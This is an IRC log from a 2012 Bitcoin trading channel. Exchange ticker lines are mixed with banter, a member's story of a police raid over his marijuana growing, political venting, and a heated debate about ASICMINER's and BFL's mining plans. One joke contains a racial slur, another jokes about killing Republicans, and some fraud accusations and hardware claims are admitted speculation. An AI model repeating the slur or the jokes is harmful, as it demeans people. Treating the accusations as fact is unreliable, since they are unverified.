16300 @ 0.00041263 = 6.7259 BTC [-] Sep 21 00:56:56 [GLBSE] [ASICMINER] 3 @ 0.12 = 0.36 BTC [-] Sep 21 00:57:47 [17:48:17] yeah, well, that's why Bill Gates hires accountants, and financial advisors, and other business people :) Sep 21 00:57:50 indeed Sep 21 00:57:53 [GLBSE] [OBSI.HRPT] 5 @ 0.0981 = 0.4905 BTC [+] Sep 21 01:05:09 [GLBSE] [TEEK.USD] 4 @ 0.0777 = 0.3108 BTC [-] Sep 21 01:06:25 [GLBSE] [TEEK.USD] 2 @ 0.0777 = 0.1554 BTC [-] Sep 21 01:07:39 [GLBSE] [RSM] 1 @ 0.3 BTC [+] Sep 21 01:16:32 sure fire way to find a job Sep 21 01:16:37 look at the obituaries Sep 21 01:16:44 they always say where the guy worked Sep 21 01:16:56 call them up and say "I hear you've got an opening" Sep 21 01:18:29 [GLBSE] [OBSI.HRPT] 1 @ 0.0981 BTC [+] Sep 21 01:18:40 [MPEX] [F.GIGA.ETF] 8120 @ 0.00025976 = 2.1093 BTC [-] Sep 21 01:18:41 [MPEX] [F.GIGA.ETF] 8536 @ 0.0002591 = 2.2117 BTC [-] Sep 21 01:19:50 <__Atlas__> lol Sep 21 01:37:51 [GLBSE] [OBSI.HRPT] 1 @ 0.0981 BTC [+] Sep 21 01:40:08 we need a "shit nefario says" Sep 21 01:44:06 Diablo, did you see the wiki page about you? Sep 21 01:44:54 What would be a good way to handle a situation that calls for a motion, while keeping the details of that motion under wraps from the public at large? Sep 21 01:45:06 nefario: yes, I saw you trolling Sep 21 01:45:23 Obsi: you cant Sep 21 01:45:25 I thought it was funny Sep 21 01:45:36 Obsi: three people can keep a secret Sep 21 01:45:40 if two of them are dead Sep 21 01:45:44 since the company would be, by definition, publicly owned, the public would know of the motion Sep 21 01:46:00 [MPEX] [S.MPOE] 8718 @ 0.00041591 = 3.6259 BTC [+] Sep 21 01:46:38 eh still doesn't work Sep 21 01:46:51 the shareholders have to see details of what they're voting on Sep 21 01:46:58 yeah Sep 21 01:47:08 as Diablo-D3 said it's not really possible Sep 21 01:47:13 Could encrypt and provide password to shareholders I guess Sep 21 01:47:19 unless you can get the shareholders to keep it to themselves Sep 21 01:47:26 well yeah that works Sep 21 01:47:32 as long as they don't share it Sep 21 01:47:36 except Sep 21 01:47:43 nefario refuses to release a list of shareholders Sep 21 01:47:44 Well it would be in their interests to keep it private Sep 21 01:47:56 well Sep 21 01:48:01 Obsi: never trust shareholders to act in their own best interest, they wont Sep 21 01:48:08 Oh I know that Sep 21 01:48:14 they will continually fuck themselves over as quickly and as hard as possible Sep 21 01:48:29 Maybe they just need love Sep 21 01:48:40 the universe invented a better idiot, and thats what we got. Sep 21 01:49:24 Looking for tasty assets to purchase. Anyone? Sep 21 01:49:37 Smoovious: thatsracist.gif Sep 21 01:49:38 I got to keep spending the BTC Sep 21 01:50:18 unless you subscribe to the "martin luther king jr made it possible for not only black people to become president but white people to become niggers" theory, then yes, it is Sep 21 01:50:21 [GLBSE] [SS] 1 @ 0.01999999 BTC [+] Sep 21 01:50:21 [GLBSE] [SS] 1 @ 0.02 BTC [+] Sep 21 01:51:32 lol Sep 21 01:51:38 indeed Sep 21 01:51:53 Smoovious: arent you in the US? Sep 21 01:52:10 dude, cops in some states taser you to death for having just pot Sep 21 01:52:47 hah good luck Sep 21 01:53:00 president fartbongo will stull arrest you for it Sep 21 01:53:27 Diablo-D3: president whowhat? Sep 21 01:53:28 Smoovious: cops in one state tasered a woman passed out due to diabetic shock because she refused to tell the cops her name Sep 21 01:53:41 kuzetsa: its what the republotrolls call obama Sep 21 01:53:49 ... and apparently you too? Sep 21 01:53:56 no, Im trolling Smoovious Sep 21 01:54:34 Diablo-D3: ok uhm... president obama "arrests" people. that's my other question I nearly asked, but since you were trolling nevermind Sep 21 01:56:33 Smoovious: I arrived home once to find 7 cop cars in my driveway Sep 21 01:57:07 considered running for a few seconds then walked in the door with my bags of groceries Sep 21 01:57:52 smiled to the cops tearing my shit apart 'sup gents' Sep 21 02:01:13 what were they doing there ? Sep 21 02:01:14 and? Sep 21 02:01:17 What was it for? You walked on grass in the park and there was a keep out sign? Sep 21 02:01:39 Was the start of a bukakke porno he was filiming Sep 21 02:01:49 and I got 6 months community service Sep 21 02:02:08 instead of the 14 year maximum Sep 21 02:02:30 did they take any of your shit? If so did you ever get it back? Sep 21 02:02:42 yes and no Sep 21 02:02:47 dub: what the fuck were they there for Sep 21 02:02:50 you missed that part Sep 21 02:02:53 they took ~50kg of marijuana Sep 21 02:02:58 (wet) Sep 21 02:02:58 >50kg Sep 21 02:03:03 oh wet Sep 21 02:03:15 I was like, they can charge you for intent to sell Sep 21 02:03:16 and no they didnt give it back Sep 21 02:03:23 and send you to high security prison Sep 21 02:03:25 forever Sep 21 02:03:34 they chraged me with selling and culitvation Sep 21 02:03:40 they should give it back... that's like... stealing man Sep 21 02:04:01 Obsi: woah Sep 21 02:04:45 Wet = uncured? Sep 21 02:05:04 Or basement was flooded? Sep 21 02:05:28 you shoulda kicked them off your property. Sep 21 02:05:30 dern kids. Sep 21 02:05:38 Smoovious: well there were several ounces dried and bagged up for sale.. Sep 21 02:06:08 What tipped them off? Did it smell like you were raising skunks there? Sep 21 02:06:32 they don't need it Sep 21 02:06:32 you cant excuse 50kilos for personal Smoovious Sep 21 02:06:48 not even dub. Sep 21 02:07:06 yeah Sep 21 02:07:10 that what i used to thought. Sep 21 02:07:12 not here they dont Sep 21 02:07:20 yup Sep 21 02:07:20 It's a legal precedent, can't do anything about it unless you happen to be on the supreme court. Sep 21 02:07:24 over a certain amount is assumed to be for supply Sep 21 02:07:30 exactly Sep 21 02:08:12 there was also the guy that showed up at the house to make a buy after they had taken me away Sep 21 02:08:20 :) Sep 21 02:08:37 Meh, citizens can be killed without trial by careful application of lables. I gotta get into that biz. Sep 21 02:09:16 [GLBSE] [OBSI.HRPT] 47 @ 0.0981 = 4.6107 BTC [+] Sep 21 02:09:50 Smoovious: nope Sep 21 02:09:52 thats not the law Sep 21 02:09:58 the law only says the amount Sep 21 02:10:10 then run for congress Sep 21 02:10:36 you must be the change you want to see in the world Sep 21 02:10:37 he cant, he got busted. Sep 21 02:10:43 kakobrekla: that doesnt stop you Sep 21 02:10:44 [GLBSE] [OBSI.HRPT] 1 @ 0.0981 BTC [+] Sep 21 02:10:54 bush jr almost died in a drunk driving accident while underage Sep 21 02:10:59 he became our president Sep 21 02:11:14 [GLBSE] [OBSI.HRPT] 15 @ 0.0981 = 1.4715 BTC [+] Sep 21 02:11:30 well as long as he didnt inhale.. Sep 21 02:12:43 [GLBSE] [OBSI.HRPT] 2 @ 0.0981 = 0.1962 BTC [+] Sep 21 02:12:44 Why did that Bush Jr. have to get 2 mandates for anyway... Sep 21 02:12:59 [GLBSE] [OBSI.HRPT] 7 @ 0.0981 = 0.6867 BTC [+] Sep 21 02:13:27 [MPEX] [S.MPOE] 14716 @ 0.00041263 = 6.0723 BTC [-] Sep 21 02:13:44 There's enough to call even that win into question. Ohio. Sep 21 02:13:53 Also Florida. Sep 21 02:15:13 http://www.youtube.com/watch?v=9DYDNYhZDc8 Sep 21 02:15:22 Old classic Sep 21 02:15:58 [GLBSE] [BITBOND] 1 @ 0.37 BTC [+] Sep 21 02:16:56 I'm not in favor of any voting machine that dosen't give out a receipt. Paper trail FTW! Sep 21 02:17:45 The machine could give you a fake paper receipt Sep 21 02:18:01 PGP dat shiz. Sep 21 02:18:15 Or whatever. Sep 21 02:20:15 Wut? Time stamp it. Sep 21 02:20:43 Ether that or do paper punch and I'll burn all the electronic machines myself. Sep 21 02:21:04 What equiptment? A punch? Sep 21 02:21:52 Oh, I just ment that without a paper trail the credibility (as shown in past elections) is zero. Sep 21 02:22:18 Even with the paper trail... who says that's what gets counted on the other side? Sep 21 02:22:22 Soooo... Ether we scrap the new machines or it's a thousand years of darkness! Sep 21 02:22:38 Your receipt can't help you check for who your vote was coutned Sep 21 02:22:43 [GLBSE] [OBSI.HRPT] 6 @ 0.0981 = 0.5886 BTC [+] Sep 21 02:23:30 Fine, now we have to do paper punch, hand counted, in a school gym or something. Sep 21 02:24:09 That's fine too. Sep 21 02:25:36 You know. I really love a lot about the US. But there's some things that just make me furious. Rigged elections and grey area assasinations are some things that boil my blood. Sep 21 02:26:40 Smoovious naw, that's no good. Then Jo-Jo the circus freak Romney supporter can try to exact revenge. Sep 21 02:26:45 [GLBSE] [OBSI.HRPT] 137 @ 0.0981 = 13.4397 BTC [+] Sep 21 02:26:47 [GLBSE] [OBSI.HRPT] 1 @ 0.0982 BTC [+] Sep 21 02:26:48 [GLBSE] [OBSI.HRPT] 50 @ 0.0983 = 4.915 BTC [+] Sep 21 02:26:49 [GLBSE] [OBSI.HRPT] 2 @ 0.0984 = 0.1968 BTC [+] Sep 21 02:27:02 Smoovious: heh Sep 21 02:27:04 screw taht Sep 21 02:27:22 1) I'm disabled Sep 21 02:27:30 2) I'm a non-violent taoist Sep 21 02:27:49 3) trololol ron paul!!! Sep 21 02:28:50 funny Sep 21 02:29:02 just hate how that works Sep 21 02:29:07 Also seperation of church and state. When someone gets that wrong I'm like *facepalm* all damn day. It's pretty much the best idea ever, and there are those who oppose it..... Sep 21 02:29:27 OneMiner: huh? Sep 21 02:29:55 kuzetsa just something that makes me angry. Sep 21 02:30:19 Lot's of anger in politics, if you are not red in the face and spitting... You're doing it wrong. Sep 21 02:30:36 http://www.dsausa.org/pdf/widemsoc.pdf -- people who don't know what socialism is, and then use it as some sort of insult. Sep 21 02:30:41 THAT makes me angry Sep 21 02:30:46 socialism isn't bad! Sep 21 02:30:54 I agree. Sep 21 02:32:11 Smoovious hu? Who is being opressed? Sep 21 02:32:24 Damn english, oppressed. Sep 21 02:33:03 If someone can't practice their religion, that's oppression. Is that what you were saying? I don't follow. Sep 21 02:33:34 Gov't = religion? Sep 21 02:33:40 Oh ya lol Sep 21 02:34:06 So we agree. Seperation of church and state is the best ever. Sep 21 02:34:20 my religion involves killing republicans and stealing all their money to use for reconstruction during the aftermath of my riteous dumbpocolypse Sep 21 02:35:27 You know, in Canada the catholic school board gets special gov't moneys. They have shot themselves in the foot. Soon Canadians will be shelling out for pastafarians and they will have gotten what they deserved for funding the catholics with public money in the first place. Sep 21 02:36:09 <__Atlas__> Ooo, politics. Sep 21 02:36:18 nah Sep 21 02:36:20 No access to any special groups. I go further in saying that religions should NOT be tax exempt in any way. Sep 21 02:36:24 we're just trolling at each other Sep 21 02:36:29 none of us know anything about politics Sep 21 02:36:36 Yes, this is pure venting. Sep 21 02:36:39 [GLBSE] [FPGAMINING] 6 @ 0.50000001 = 3 BTC [+] Sep 21 02:36:40 [GLBSE] [FPGAMINING] 10 @ 0.5 = 5 BTC [-] Sep 21 02:36:42 [GLBSE] [FPGAMINING] 3 @ 0.46 = 1.38 BTC [-] Sep 21 02:36:42 religion should be outlawed Sep 21 02:36:43 [GLBSE] [FPGAMINING] 10 @ 0.455 = 4.55 BTC [-] Sep 21 02:36:44 [GLBSE] [FPGAMINING] 4 @ 0.451 = 1.804 BTC [-] Sep 21 02:36:45 [GLBSE] [FPGAMINING] 10 @ 0.45 = 4.5 BTC [-] Sep 21 02:36:46 [GLBSE] [FPGAMINING] 10 @ 0.44 = 4.4 BTC [-] Sep 21 02:36:47 [GLBSE] [FPGAMINING] 9 @ 0.431 = 3.879 BTC [-] Sep 21 02:36:47 [GLBSE] [FPGAMINING] 10 @ 0.43 = 4.3 BTC [-] Sep 21 02:36:48 [GLBSE] [FPGAMINING] 10 @ 0.42 = 4.2 BTC [-] Sep 21 02:36:49 [GLBSE] [FPGAMINING] 8 @ 0.41 = 3.28 BTC [-] Sep 21 02:37:49 Religion must be driven from every corner of the gov't. It would be most excelent of us to take god off of the money (as Romney fears apparently). Sep 21 02:39:27 Seriously... Does the christian god care if he is on the money? Sep 21 02:40:00 [MPEX] [S.MPOE] 4282 @ 0.00041263 = 1.7669 BTC [-] Sep 21 02:40:02 [MPEX] [S.MPOE] 53600 @ 0.00041112 = 22.036 BTC [-] Sep 21 02:40:03 [MPEX] [S.MPOE] 605 @ 0.00041105 = 0.2487 BTC [-] Sep 21 02:40:34 Smoovious don't worry. It's the last of the old dumb people. When they die, it's all roses and backrubs from then on. Sep 21 02:42:24 Also, I demand that a plate of pasta be stamped into the next coins they mint! It's that or it's discrimination! Sep 21 02:44:10 I had some right wing (they listen to Rush, yes that far right) folks who I had known my entire life say, "Yes, our marriage will be affected" but then they couldn't say one more word on HOW. Also they think CFL lightbulbs are a conspiracy and probably a ponzi. Sep 21 02:44:42 woah Sep 21 02:44:48 Not a joke. I'm very sad to say I'm serious. Sep 21 02:45:56 Not the ponzi part, that's a joke. The conspiracy one is serious. Sep 21 02:46:35 [GLBSE] [OBSI.HRPT] 2 @ 0.0984 = 0.1968 BTC [+] Sep 21 02:47:04 Friend is here. I'm out. Lates o/ Sep 21 02:47:59 wat Sep 21 02:48:17 I gotta take this one. Sep 21 02:49:27 the mercury is less than if you burned coal. Mercury is released into the air from coal power. Also radiation in greater quantities than you get from all the nuclear disasters around the world. Sep 21 02:50:00 sry gotta run. PM me if you'd like to say anything! Sep 21 02:50:36 LEDs sucked when cfls finally got decent Sep 21 02:50:44 LEDs are the next step Sep 21 02:51:01 [GLBSE] [CPA] 3 @ 0.0997 = 0.2991 BTC [-] Sep 21 02:51:21 there wasn't years ago Sep 21 02:51:59 yeah that kickstarter for the wifi LEDs looked pretty sweet Sep 21 02:52:25 shit internet time messes with my real time sense... 6-8 maybe? Sep 21 02:53:57 [GLBSE] [BITCOINMINV] 2 @ 0.12499999 = 0.25 BTC [-] Sep 21 02:54:25 [GLBSE] [OBSI.HRPT] 1 @ 0.09809999 BTC [-] Sep 21 02:54:31 fucking blue LEDs on tech Sep 21 02:54:42 [GLBSE] [OBSI.HRPT] 1 @ 0.09809999 BTC [-] Sep 21 02:55:04 bedroom looks like a disco Sep 21 02:55:10 [GLBSE] [BITCOINMINV] 1 @ 0.12499999 BTC [-] Sep 21 02:56:24 [GLBSE] [BITCOINMINV] 46 @ 0.125 = 5.75 BTC [+] Sep 21 02:56:25 [GLBSE] [BITCOINMINV] 7 @ 0.125 = 0.875 BTC [+] Sep 21 02:59:23 [MPEX] [S.MPOE] 11295 @ 0.00041105 = 4.6428 BTC [-] Sep 21 02:59:24 [MPEX] [S.MPOE] 36200 @ 0.00041051 = 14.8605 BTC [-] Sep 21 02:59:25 [MPEX] [S.MPOE] 43900 @ 0.00041017 = 18.0065 BTC [-] Sep 21 02:59:26 [MPEX] [S.MPOE] 14970 @ 0.00040944 = 6.1293 BTC [-] Sep 21 02:59:27 [MPEX] [S.MPOE] 50900 @ 0.00040916 = 20.8262 BTC [-] Sep 21 02:59:29 [MPEX] [S.MPOE] 33900 @ 0.00040863 = 13.8526 BTC [-] Sep 21 02:59:30 [MPEX] [S.MPOE] 16700 @ 0.00040862 = 6.824 BTC [-] Sep 21 02:59:31 [MPEX] [S.MPOE] 27920 @ 0.00040858 = 11.4076 BTC [-] Sep 21 02:59:32 [MPEX] [S.MPOE] 47600 @ 0.00040829 = 19.4346 BTC [-] Sep 21 02:59:32 [MPEX] [S.MPOE] 53700 @ 0.00040822 = 21.9214 BTC [-] Sep 21 02:59:33 [MPEX] [S.MPOE] 34500 @ 0.00040808 = 14.0788 BTC [-] Sep 21 02:59:34 [MPEX] [S.MPOE] 44415 @ 0.00040741 = 18.0951 BTC [-] Sep 21 03:01:39 [MPEX] [O.BTCUSD.C100T] 2 @ 0.21757367 = 0.4351 BTC [+] Sep 21 03:01:41 [MPEX] [O.BTCUSD.C100T] 975 @ 0.19866961 = 193.7029 BTC [-] Sep 21 03:02:28 [MPEX] [O.BTCUSD.C090T] 100 @ 0.27910265 = 27.9103 BTC [-] **** BEGIN LOGGING AT Fri Sep 21 07:54:35 2012 Sep 21 07:57:03 [GLBSE] [PUREMINING] 3 @ 0.09520001 = 0.2856 BTC [-] Sep 21 08:11:53 [GLBSE] [ASICMINER] 11 @ 0.123 = 1.353 BTC [+] Sep 21 08:21:02 [MPEX] [F.GIGA.ETF] 7900 @ 0.00025766 = 2.0355 BTC [-] Sep 21 08:22:22 [MPEX] [F.GIGA.ETF] 17200 @ 0.00027194 = 4.6774 BTC [+] Sep 21 08:22:23 [MPEX] [F.GIGA.ETF] 100 @ 0.00030056 = 0.0301 BTC [+] Sep 21 08:35:22 [GLBSE] [YARR] 14 @ 1 = 14 BTC [-] Sep 21 08:36:28 [GLBSE] [BMF] 2 @ 0.7397 = 1.4794 BTC [-] Sep 21 08:39:22 [GLBSE] [NYAN.B] 1 @ 1.02 BTC [+] Sep 21 08:40:31 [GLBSE] [NYAN.C] 15 @ 0.35 = 5.25 BTC [+] Sep 21 08:50:18 [MPEX] [F.GIGA.ETF] 5900 @ 0.000301 = 1.7759 BTC [+] Sep 21 08:52:06 [GLBSE] [OBSI.HRPT] 4 @ 0.0982 = 0.3928 BTC [-] Sep 21 08:52:37 [GLBSE] [FPGA.CONTRACT] 2 @ 0.0616 = 0.1232 BTC [-] Sep 21 08:58:38 [GLBSE] [RAREEARTH] 9 @ 0.00999999 = 0.09 BTC [+] Sep 21 09:10:21 Wait, how would that work usagi? Sep 21 09:10:57 Aye Sep 21 09:14:50 Alright Sep 21 09:15:12 [GLBSE] [OBSI.HRPT] 5 @ 0.0982 = 0.491 BTC [-] Sep 21 09:15:13 [GLBSE] [OBSI.HRPT] 4 @ 0.0984 = 0.3936 BTC [+] Sep 21 09:15:52 yabif? whos that Sep 21 09:16:29 It's a fund on GLBSE Sep 21 09:17:02 [MPEX] [S.MPOE] 50449 @ 0.00038996 = 19.6731 BTC [+] Sep 21 09:17:04 [MPEX] [S.MPOE] 10551 @ 0.00039029 = 4.1179 BTC [+] Sep 21 09:20:25 Ive never heard of it Sep 21 09:21:03 usagi: btw, you never told matthew off in the dmc thread Sep 21 09:28:23 [MPEX] [B.MPCD.A] 10000 @ 0.00101516 = 10.1516 BTC [+] Sep 21 09:30:33 [MPEX] [B.MPCD.A] 5000 @ 0.00101516 = 5.0758 BTC [+] Sep 21 09:56:02 [MPEX] [F.GIGA.ETF] 15300 @ 0.000301 = 4.6053 BTC [+] Sep 21 10:02:10 [GLBSE] [OBSI.HRPT] 12 @ 0.0984 = 1.1808 BTC [+] Sep 21 10:20:27 morning Sep 21 10:22:16 [MPEX] [F.GIGA.ETF] 16300 @ 0.000301 = 4.9063 BTC [+] Sep 21 10:29:50 [GLBSE] [V.HRL] 1 @ 0.999 BTC [-] Sep 21 10:52:46 [MPEX] [F.GIGA.ETF] 12834 @ 0.000301 = 3.863 BTC [+] Sep 21 10:52:48 [MPEX] [S.MPOE] 26400 @ 0.00038891 = 10.2672 BTC [-] Sep 21 10:52:49 [MPEX] [S.MPOE] 9300 @ 0.00038575 = 3.5875 BTC [-] Sep 21 11:12:28 [GLBSE] [OBSI.HRPT] 2 @ 0.0984 = 0.1968 BTC [+] Sep 21 11:22:46 [MPEX] [F.GIGA.ETF] 9300 @ 0.000301 = 2.7993 BTC [+] Sep 21 11:40:25 [GLBSE] [BIB.PIRATE] 30 @ 0.03501 = 1.0503 BTC [+] Sep 21 11:49:02 [MPEX] [S.MPOE] 18500 @ 0.00038911 = 7.1985 BTC [+] Sep 21 11:54:42 so bfl is run by fraudsters lol Sep 21 11:55:21 Chaang-Noi: do you know how NOT news this was? Sep 21 11:55:27 I "broke" this news like a billion months ago Sep 21 12:13:13 [GLBSE] [OBSI.HRPT] 49 @ 0.098 = 4.802 BTC [-] Sep 21 12:13:18 https://bitcointalk.org/index.php?topic=111837.0 Sep 21 12:13:25 feedback wnated, thanks Sep 21 12:19:38 The price of food will not necessarily go up. Sep 21 12:20:02 [MPEX] [S.MPOE] 4100 @ 0.00038706 = 1.5869 BTC [-] Sep 21 12:20:04 [MPEX] [S.MPOE] 56300 @ 0.00038684 = 21.7791 BTC [-] Sep 21 12:20:05 [MPEX] [S.MPOE] 1669 @ 0.00038575 = 0.6438 BTC [-] Sep 21 12:20:08 midnightmagic: it will Sep 21 12:20:12 people always panic Sep 21 12:20:17 the government drives them to do so Sep 21 12:20:21 people are sheep Sep 21 12:20:23 sheep need to eat. Sep 21 12:20:28 And BFL is NOT run by "fraudsters". One guy may be a fraudster. Sep 21 12:20:42 one guy that OWNS AND RUNS THE ENTIRE THING Sep 21 12:20:51 And the other 21 people? Sep 21 12:21:15 hoping they were paid up front Sep 21 12:21:30 And have they not delivered in a creative way on promises that a good number of people said were impossible in the past? Sep 21 12:22:09 only if creative == less than promised Sep 21 12:22:41 midnightmagic i think food will go up in price but no it is not a fact Sep 21 12:22:48 Even with the fewer MH/s, the numbers were still considered impossible. It remained a mystery until ngzhang reversed it at the hardware level. Sep 21 12:23:28 erm Sep 21 12:23:37 midnightmagic: all ngzhang did was copy asicminer's plan Sep 21 12:23:54 .. no, he reattached the fuse on the BFL single and identified the chip they were using. Sep 21 12:24:09 oh, you mean the fpga Sep 21 12:24:13 Yes. Sep 21 12:24:17 you do know hes doing his own asics now, right? Sep 21 12:24:26 Yes, of course I do. Sep 21 12:24:40 [MPEX] [O.BTCUSD.P010N] 33 @ 0.02951475 = 0.974 BTC [-] Sep 21 12:25:02 ngzhang, regardless of whether he's "copying" someone's business plan, has delivered more reliably, and more openly I might add, than anyone building mining hardware put together. Sep 21 12:25:41 not copying a business plan Sep 21 12:25:43 copying the whole thing Sep 21 12:25:54 hes even fabbing them at the same company on the same process Sep 21 12:26:07 though, hilarious part, I would have gone the same path Sep 21 12:26:30 Who says this? Sep 21 12:26:40 erm, I say this? Sep 21 12:26:55 And did you pull this out of thin air? How do you know this? Sep 21 12:26:57 they're both fabbing at SMIC on 130nm using SMIC IP cores Sep 21 12:27:24 Did either one of them design the logic itself? Sep 21 12:27:29 nope Sep 21 12:27:51 they put together the masks, but they're using SMIC's existing IP Sep 21 12:27:58 all they did was spam them on the mask Sep 21 12:28:08 How do you know this is what ngzhang is doing? Sep 21 12:28:31 because he said it in his damned thread? Sep 21 12:29:36 I don't see where ngzhang said he's using SMIC IP. Sep 21 12:30:28 You're speculating aren't you? Sep 21 12:31:16 its why you use smic Sep 21 12:31:34 quite a few fabs may have IP libraries, smic is the cheapest Sep 21 12:31:38 [MPEX] [O.BTCUSD.P030T] 32 @ 0.02688559 = 0.8603 BTC [+] Sep 21 12:32:56 You're speculating. Are you also speculating for ASICMINER or do you know something more than was posted in their totally unhelpful "yes we're going to use our customers own money to compete against them" thread? Sep 21 12:33:39 "And we're even going to try to do it secretly." Sep 21 12:34:32 midnightmagic: you cant troll me no matter how hard you try Sep 21 12:34:37 and why are you so pissed off anyhow Sep 21 12:34:50 did your jimmies get rustled over the fact I know more than you do? Sep 21 12:36:27 ... Sep 21 12:37:26 Say he did "copy" even the design of the asicminer, as you are implying. Why wouldn't I prefer to put my money with ngzhang when asicminer is going to mine against their own device customers, with the money their customers use to buy their devices? Sep 21 12:39:12 Also, I'm not trolling you. Either you know something you aren't telling, or you don't. Either way it doesn't change what I'm going to do: all it changes is you're pretending to know something that's impossible to verify (show me da unicorn) or not. Sep 21 12:40:17 The conflict appears to be arising because you seem to have backed an anticompetitive horse and I think they're going to get stomped by the bitcoin devs. Sep 21 12:42:55 midnightmagic: huh? Sep 21 12:43:20 I'd also like to point out that I'm one of the very few people who doesn't think you tried to do something naughty with usagi and that nefario freezing your shares was a dick move. Sep 21 12:43:38 I think you're confused about how asicminer is operating Sep 21 12:43:49 they're going to mine with early units to repay investors and sell the rest Sep 21 12:44:29 No, they're contemplating mining past that and growing their personal mining farm to 50TH. Or, at the very least, they're not going to suddenly stop mining with their 12TH, which reduces the value of the asic devices they sell. Sep 21 12:45:11 midnightmagic: I dont think they're going to maintain a perm farm Sep 21 12:45:26 That's competing with their own customers, using the profits from customers buying their devices to power their devices, and likely grow their personal mining farm totally in secret. Sep 21 12:45:32 They don't even see what's wrong with that. Sep 21 12:45:48 friedcat appears to be totally oblivious. Sep 21 12:46:50 I dont see whats wrong with that strictly Sep 21 12:46:58 its no different than if friedcat bought them for himself and mined to himself Sep 21 12:47:38 I'm failing to see how that is a counter-example to my point. Sep 21 12:47:57 so... hes... not allowed to buy his own product? Sep 21 12:48:37 I am not acknowledging its correctness, I'm saying it's irrelevant whether that is true or not. Sep 21 12:49:13 its not irrelevant Sep 21 12:49:21 that farm that they're building is for shareholder use. Sep 21 12:50:03 The devices they are selling are for customer use. If they are mining, the devices are worth less. Sep 21 12:50:17 if _anyone_ is mining, the devices are worth less Sep 21 12:50:17 period Sep 21 12:50:21 thats what mining is Sep 21 12:50:28 Yes, exactly. Sep 21 12:50:36 so your entire argument is vastly moot Sep 21 12:50:54 you cant just grab asicminer for mining on behalf of shareholders Sep 21 12:51:28 No, it means asicminer's non-device-selling activities are destroying the maximum potential value of their own devices, AND they're in a conflict of interest because they're competing directly with them for a slice of the available btc pie. Sep 21 12:51:49 *using* their own customers money against then thereby. Sep 21 12:51:54 no Sep 21 12:52:02 they're using their own SHAREHOLDERS money against them Sep 21 12:52:05 this isnt like bfl Sep 21 12:52:10 asicminer shares own the company Sep 21 12:52:16 bfl preorders do not Sep 21 12:52:21 And friedcat owns.. what percentage? Sep 21 12:52:28 asicminer has accepted _no_ preorders Sep 21 12:52:31 there are zero customers Sep 21 12:52:40 so _what_ customer money? Sep 21 12:52:46 And it's irrelevant that the shareholders are the ones financing the practice, that doesn't change a thing. Sep 21 12:52:53 and friedcat owns like 15 or 20% or some shit like that Sep 21 12:52:55 how you figure ? Sep 21 12:53:06 midnightmagic: erm, Im paying friedcat to mine for me Sep 21 12:53:09 Are they going to sell any devices? Sep 21 12:53:13 are you saying he shouldnt mine for me? Sep 21 12:53:17 midnightmagic that's their problem ? Sep 21 12:53:19 Or are you trying to tell me it's really just a glorified mining contract? Sep 21 12:53:19 I paid him to do it Sep 21 12:53:22 if i use a car i can't sell it anymore ? Sep 21 12:53:30 midnightmagic: its a glorified mining contract that sells hardware. Sep 21 12:53:40 mircea_popescu: .. there's only so many bitcoins released every 10 minutes. Sep 21 12:53:45 so ? Sep 21 12:53:52 mircea_popescu: The owners owning cars is a false analogy. Sep 21 12:53:54 [GLBSE] [GIGAMINING] 3 @ 0.68 = 2.04 BTC [-] Sep 21 12:53:56 a company is entitled to make an item, use it, sell it, whatever they want. Sep 21 12:53:58 why not ? Sep 21 12:53:58 mircea_popescu: so you dont get the argument either? Sep 21 12:54:11 Diablo-D3 can't say that i do. if they took preorder money and financed from that then yes Sep 21 12:54:11 shareholders are NOT entitled to buy the hardware Sep 21 12:54:21 but on shareholder money... why can't they do what they please ? Sep 21 12:54:28 mircea_popescu: Look at it from the customers' perspective. Why the hell would I buy a mining tool from the same company who's already staked the choicest claim and mined it for all it's worth? Sep 21 12:54:39 midnightmagic :"customer" is not a party to this discussion Sep 21 12:54:49 fuckall cares what an uninvolved third party likes or not Sep 21 12:54:56 It is ENTIRELY a party to this discussion, because that's the genesis of my objection! Sep 21 12:55:03 midnightmagic: THERE ARE NO CUSTOMERS YET Sep 21 12:55:08 exactly. Sep 21 12:55:10 what customer ? Sep 21 12:55:18 NO ONE HAS BOUGHT ANY, NO MONEY HAS EXCHANGED HANDS Sep 21 12:55:22 simmer down eh Sep 21 12:55:23 Diablo-D3: Why would I support a business which intends to compete directly against other miners? Sep 21 12:55:31 midnightmagic for a profit Sep 21 12:55:34 Diablo-D3: It's in their business plan. Sep 21 12:55:35 midnightmagic: THEN BFL, BASIC, AND EVEN AMD IS BAD Sep 21 12:55:36 just like any other business i support. Sep 21 12:55:41 _AMD_ IS BAD Sep 21 12:55:45 THE PEOPLE WHO MAKE GPUS Sep 21 12:55:57 AMD COMPETES WITH MINING BECAUSE THEY SELL GPUS THAT CAN BE MINED ON Sep 21 12:56:02 mircea_popescu: AS A SHAREHOLDER. Not as a customer buying their devices. In other words, they're cannibalizing their future earnings selling devices by doing the dick move of mining for themselves. Sep 21 12:56:05 DO YOU UNDERSTAND HOW STUPID THAT SOUNDS Sep 21 12:56:15 [GLBSE] [PUREMINING] 2 @ 0.0999 = 0.1998 BTC [+] Sep 21 12:56:23 Neither of you know what you're talking about. Sep 21 12:56:25 midnightmagic so basically you'd prefer they sold the items rather than mine with them/ this is fine. make them an offer Sep 21 12:56:34 im sure if you pay enough you could get the devices earlier. Sep 21 12:56:55 if they don't accept the offer that's still fine, obviously you didn't offer enough. Sep 21 12:56:58 Why would I? I'll send my money to people who don't cannibalize their customers' potential profit. Sep 21 12:57:14 And show absolutely zero ability to grasp even the notion of what that means. Sep 21 12:57:18 ... Sep 21 12:57:25 by this logic anyone making asics is guilty Sep 21 12:57:30 No. Sep 21 12:57:30 of "cannibalizing" the profits of gpu miners Sep 21 12:57:36 midnightmagic: but um Sep 21 12:57:42 if ANYONE mines with asics Sep 21 12:57:43 there's no ownership of future mined bitcoins Sep 21 12:57:49 it screws anyone who buys asics Sep 21 12:57:52 thats what mining is Sep 21 12:57:53 they belong to he who gets them, is all. Sep 21 12:57:56 That's totally, totally irrelevant. Sep 21 12:57:58 hm. Sep 21 12:58:02 [MPEX] [F.GIGA.ETF] 1200 @ 0.000301 = 0.3612 BTC [+] Sep 21 12:58:05 so _anyone_ who adds more hardware to the network is guilty of fucking miners Sep 21 12:58:10 What goes on lsewhere is irrelevant. Sep 21 12:58:23 midnightmagic: you cant have your cake and eat it too Sep 21 12:58:37 either we blame anyone _adding_ hardware, no matter if they manufactured it or not, to the network Sep 21 12:58:48 You make a device, if you didn't mine 12TH and then 50TH, it would have made x more profit. If you DO mine, with your customers' own money (which is in their business plan) you are reducing the value of those devices. Sep 21 12:58:57 It's really quite simple. Sep 21 12:59:14 midnightmagic: yes, but that also goes on even if you buy from basic or 